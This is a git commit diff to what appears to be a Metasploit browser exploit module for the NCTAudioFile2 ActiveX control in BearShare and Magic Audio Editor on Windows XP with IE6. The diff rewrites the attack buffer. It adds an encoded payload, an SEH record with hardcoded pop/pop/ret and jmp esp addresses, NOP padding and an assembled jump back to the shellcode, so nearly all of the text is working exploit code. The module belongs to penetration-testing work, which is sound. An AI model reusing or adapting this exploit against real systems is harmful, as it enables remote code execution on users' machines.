updated technique

git-svn-id: file:///home/svn/framework3/trunk@7867 4d416f70-5f16-0410-b530-b9f4589650da
2009-12-15 00:32:07 +00:00 · 2009-12-15 00:32:07 +00:00 · 1813a0fb9a
parent b6c497467e
commit 1813a0fb9a
1 changed files with 34 additions and 16 deletions
--- a/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb
+++ b/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb
@ -44,23 +44,26 @@ class Metasploit3 < Msf::Exploit::Remote
 				},
 			'Payload'        =>
 				{
-					'Space'         => 800,
+					'Space'         => 2048,
 					'BadChars'      => "\x00\x09\x0a\x0d'\\",
-					'StackAdjustment' => -3500,
+					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
 				},
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
+					# tested with:
+					#
+					# BearShare 6.0.2.26789 (NCTAudioFile2.dll v2.5.7.514)
 					# BearShare 6.0.0.22717 (NCTAudioFile2.dll v2.5.7.514)
-					# Magic Audio Editor Pro v10.3.11 and v10.3.15.1 (NCTAudioFile2.dll v2.6.1.643)
-					# base + 0x86cd6
-					[ 'Windows XP SP3 Pro English',     { 'Offset' => 4100, 'Ret' => 0x1dc0000 + 0x86cd6 } ], # p/p/r NTAudioFile2.dll (v2.5.7.514 and v2.6.1.643)
-					[ 'Windows XP SP3 Pro English',     { 'Offset' => 4100, 'Ret' => 0x1d10000 + 0x86cd6 } ], # p/p/r NTAudioFile2.dll (v2.5.7.514 and v2.6.1.643)
-					
-					# SP2 was IE6, SP3 was IE8
-					[ 'Windows XP SP2 Pro English',     { 'Offset' => 4100, 'Ret' => 0x746C15A9 } ], # p/p/r in msls31.dll
-					[ 'Windows XP SP3 Pro English',     { 'Offset' => 4100, 'Ret' => 0x10017C8A } ], # p/p/r in NCTAudioFile2.dll v2.6.1.643
-					
+					# Magic Audio Editor Pro v10.3.11 (NCTAudioFile2.dll v2.6.1.643)
+					# Magic Audio Editor Pro v10.3.15.1 (NCTAudioFile2.dll v2.6.1.643)
+					#
+					[ 'Windows XP SP2/SP3 Pro English (IE6)',
+						{
+							'PopPopRet' => 0x746C15A9, # p/p/r in msls31.dll (ie6)
+							'jmp esp' => 0x774699bf, # user32.dll (xp sp2 and sp3)
+						}
+					], 
 				],
 			'DisclosureDate' => 'Jan 24 2007',
 			'DefaultTarget'  => 0))
@ -74,11 +77,26 @@ class Metasploit3 < Msf::Exploit::Remote
 		vname	= rand_text_alpha(rand(100) + 1)
 		strname	= rand_text_alpha(rand(100) + 1)
 		
-		# Set the exploit buffer	
-		sploit =  rand_text_alpha(target['Offset'])
-		sploit << generate_seh_payload(target.ret)
-		# ensure SEH is triggered..
-		sploit << rand_text_alpha(1000) * 17
+		# dual targeting super fun..
+		sploit = p.encoded
+		sploit << rand_text_alpha(4100 - p.encoded.length)
+		
+		# if seh is triggered, we'll use a pop/pop/ret
+		seh = generate_seh_record(target['PopPopRet'])
+		sploit << seh
+		
+		# padding
+		sploit << make_nops(16 - seh.length)
+		
+		# otherwise, we need to jump to the stack
+		sploit << [target['jmp esp']].pack('V')
+		sploit << make_nops(32)
+		
+		# jump back to the payload :)
+		sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-0x1000").encode_string
+		
+		# try to ensure SEH is triggered..
+		sploit << rand_text_alpha(1000) * 18
 			
 		# Build out the message
 		content = %Q|